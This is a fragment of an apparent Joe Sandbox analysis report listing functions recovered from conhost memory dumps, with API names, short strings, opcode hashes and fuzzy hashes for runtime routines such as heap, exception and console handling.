                              • Instruction Fuzzy Hash: 99F08C74304FA2D2EA44CB13B91812BA260BB4CFC4F888130EE0A07B28CE3DC4598741
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: AddressFreeHandleLibraryModuleProc
                              • String ID: CorExitProcess$mscoree.dll
                              • API String ID: 4061214504-1276376045
                              • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                              • Instruction ID: 28d4fccaedac028154080d8e189b9f9ff7c6be91852fa0d4c06e1e970fdfaa28
                              • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                              • Instruction Fuzzy Hash: DDF09A31201E23D5EA14CB24A89936A6330EB8D7A4F940729DAAA461E4CF3EC44CC782
                              APIs
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                              • Instruction ID: ba18c3f675caa653c18a6edee8c88b723e2462e46b1748b847c727100ef88501
                              • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                              • Instruction Fuzzy Hash: 3502C832219B95C6EBA0CB55F49435AB7A0F3C8B94F104016EACE87BA8DF7DD494CB01
                              APIs
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: Value
                              • String ID:
                              • API String ID: 3702945584-0
                              • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                              • Instruction ID: e23a178624f29426ce772747224c1cda9e6c7ccc34c626f1ac0666e7c166730d
                              • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                              • Instruction Fuzzy Hash: 8D510535704E22C7E365CF16E448A5AB3A0F78CB84F104169EE4A53B95DF3AD856CB42
                              APIs
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: Value
                              • String ID:
                              • API String ID: 3702945584-0
                              • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                              • Instruction ID: 0329c7e65dd7454430bdaa91c08835510e8835c4612a3ef917227226cd4e19d5
                              • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                              • Instruction Fuzzy Hash: 7051C435614F63C7E768CF26E848A5AB3A0F38CB84F504159EE4A53754DF3AE81ACB41
                              APIs
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                              • Instruction ID: 38c1ad4d6f540bb4c4accf071e2ba9d14e222e363034afd79c464bb205976000
                              • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                              • Instruction Fuzzy Hash: 6161B436129F95C6E760CB55E49831AB7A0F38C788F104116FA8E87BA8DB7ED551CF02
                              APIs
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: CurrentProcessProtectVirtual$HandleModule
                              • String ID:
                              • API String ID: 1092925422-0
                              • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                              • Instruction ID: aa84cf2cb47f7b628e92012e0a05ad79cff5a9a10862529f53e8222252845782
                              • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                              • Instruction Fuzzy Hash: 09114F36619F52D3EB64CF25E40825AA7B0FB48B84F040026EE4D037A4EB7ED958C785
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                              • String ID: csm
                              • API String ID: 2395640692-1018135373
                              • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                              • Instruction ID: 6e604f811e5c22745b15151b84095b0b849508a6378a23668fad9b31671475a6
                              • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                              • Instruction Fuzzy Hash: DF51F632311E22CAEB54EF25E44CB6D7795F358B98F148121DE4A47788DB7AE861C702
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000025.00000003.2595945338.0000026504E70000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000026504E70000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_3_26504e70000_conhost.jbxd
                              Similarity
                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                              • String ID: csm$csm
                              • API String ID: 3896166516-3733052814
                              • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                              • Instruction ID: da4f9f6e30df869c532c8b84be5f34f21d5d409bedd1020b3bf424d6641e63ab
                              • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                              • Instruction Fuzzy Hash: 7A518F72204BA2CAEB78CF21D64C36E77A0F758BA4F144525DB9947BD6CB3AC450CB02
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                              • String ID: csm$csm
                              • API String ID: 3896166516-3733052814
                              • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                              • Instruction ID: b676f1553de569733d93bcd983a6f8c0b3a1d410da4b5d2addbcd18e115fe1da
                              • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                              • Instruction Fuzzy Hash: 0E51A132200BA2CBEB74CF26D5483587BA1F79CB94F144166DA9947BD5CB3AE474CB02
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: CallEncodePointerTranslator
                              • String ID: MOC$RCC
                              • API String ID: 3544855599-2084237596
                              • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                              • Instruction ID: 84c22867b4d34a6f5a0905008b5f411110f470f2ef102db012fcddc372bde6cb
                              • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                              • Instruction Fuzzy Hash: 1261B072508FD5C6EB30CF15E44439AB7A0F789B98F044625EB9813B95DB7DD1A4CB01
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                              • String ID: pid_
                              • API String ID: 517849248-4147670505
                              • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                              • Instruction ID: 266c584d3d60800f475f0c504a3a1a61c9bb93cba0c3327651dc66ee92436a12
                              • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                              • Instruction Fuzzy Hash: 91119335314FB3D2FB10DB25E80939A63A4F74C780F9540259E8983798EF6AD959C741
                              APIs
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: FileWrite$ConsoleErrorLastOutput
                              • String ID:
                              • API String ID: 2718003287-0
                              • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                              • Instruction ID: fbc5c54a91f8f7b9973e0fc259539724f17536e2f8d6065aab9bd63160195216
                              • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                              • Instruction Fuzzy Hash: 8BD1EC32714EA1C9E711CFA9D4482ED3BB1F758B98F404266CF5EA7B99DA35C10AC381
                              APIs
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: Heap$Process$Free
                              • String ID:
                              • API String ID: 3168794593-0
                              • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                              • Instruction ID: aa754efb9ffae3811ea115156bcfd0b0ec8a979d50f7247a5760580d011c7a51
                              • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                              • Instruction Fuzzy Hash: A0018832610FA1EAE715DF66E80824AB7A4F78CF88F094125DF4943728DF39D096C780
                              APIs
                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,0000026504EB28DF), ref: 0000026504EB2A12
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: ConsoleMode
                              • String ID:
                              • API String ID: 4145635619-0
                              • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                              • Instruction ID: c4a5a3ae41b29c4ac9c4a3d20ec2ee988352c0ec33a4dde363470105f40124a6
                              • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                              • Instruction Fuzzy Hash: DA91F432610E62C5FB61CF65949C3AE2BA0FB4CB88F444146DF4A57B85DA36C44AC782
                              APIs
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                              • String ID:
                              • API String ID: 2933794660-0
                              • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                              • Instruction ID: 8356f283921d1d4bfa668e16a0d6b3d44ecf3101c91fe09d84b1cc399310644c
                              • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                              • Instruction Fuzzy Hash: B8113936711F16CAEB00CFA0E8593A933A4F71D768F440E21EE6D867A4DF79C1698381
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: FileType
                              • String ID: \\.\pipe\
                              • API String ID: 3081899298-91387939
                              • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                              • Instruction ID: cfad7224615c1d0e7f08431694279402c24c7d2745ef4aa9665280c817c40793
                              • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                              • Instruction Fuzzy Hash: E071D336200FA3C2E774DF2AA8483EA6794F78DBC4F414056DE4A63B89DE36D614C742
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000025.00000003.2595945338.0000026504E70000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000026504E70000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_3_26504e70000_conhost.jbxd
                              Similarity
                              • API ID: CurrentImageNonwritable__except_validate_context_record
                              • String ID: csm
                              • API String ID: 3242871069-1018135373
                              • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                              • Instruction ID: fe9af848fbc6b1411e7f4e73132b99e518716e7e8d72fbc4ee7dd9480fa5f62f
                              • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                              • Instruction Fuzzy Hash: 99510532311E62CAEB54EF55E54CB6E3391F368BA8F158625DB4A43788EB7AC841C701
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000025.00000003.2595945338.0000026504E70000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000026504E70000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_3_26504e70000_conhost.jbxd
                              Similarity
                              • API ID: CallTranslator
                              • String ID: MOC$RCC
                              • API String ID: 3163161869-2084237596
                              • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                              • Instruction ID: 7cb371ebe1f38dd836efb8d698b7931f5380c708502e002ecfd015cff438381b
                              • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                              • Instruction Fuzzy Hash: 4661B172508FC5C5EB70DF15E54439ABBA0FB99BA8F048215EB9807B9ADB7DC190CB01
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: FileType
                              • String ID: \\.\pipe\
                              • API String ID: 3081899298-91387939
                              • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                              • Instruction ID: 95646e58848f0ea7e05806d1f3e8b0a284e4bff4d256d04cc7f37b397110c7b1
                              • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                              • Instruction Fuzzy Hash: 01513936204FA3C1EA64CE35A45C3AA6B51FBCC780F540065EF4963B99DE3BDA24C742
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: ErrorFileLastWrite
                              • String ID: U
                              • API String ID: 442123175-4171548499
                              • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                              • Instruction ID: 95c7de3d60571f03dbf528cd1ef22946b560d1cd9ac4b427295b98200fee9b4c
                              • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                              • Instruction Fuzzy Hash: EA411532625EA1C6E720DF65E44C79AB7A0FB8C784F800121EF4D87758EB39C405CB85
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: ExceptionFileHeaderRaise
                              • String ID: csm
                              • API String ID: 2573137834-1018135373
                              • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                              • Instruction ID: f2eb958866feec674a9ec961b9c03993d6b81571bd2190b20af915db2189d399
                              • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                              • Instruction Fuzzy Hash: 1A115B32214F9082EB61CB25F40825AB7E1F788B88F594620EE8D07B69DF3DC561CB00
                              APIs
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: Heap$Process$AllocFree
                              • String ID:
                              • API String ID: 756756679-0
                              • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                              • Instruction ID: cb74864c4254a2cdae2ea87dbcb3073e42bb13387c9c6a3b5c5a833ca359010a
                              • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
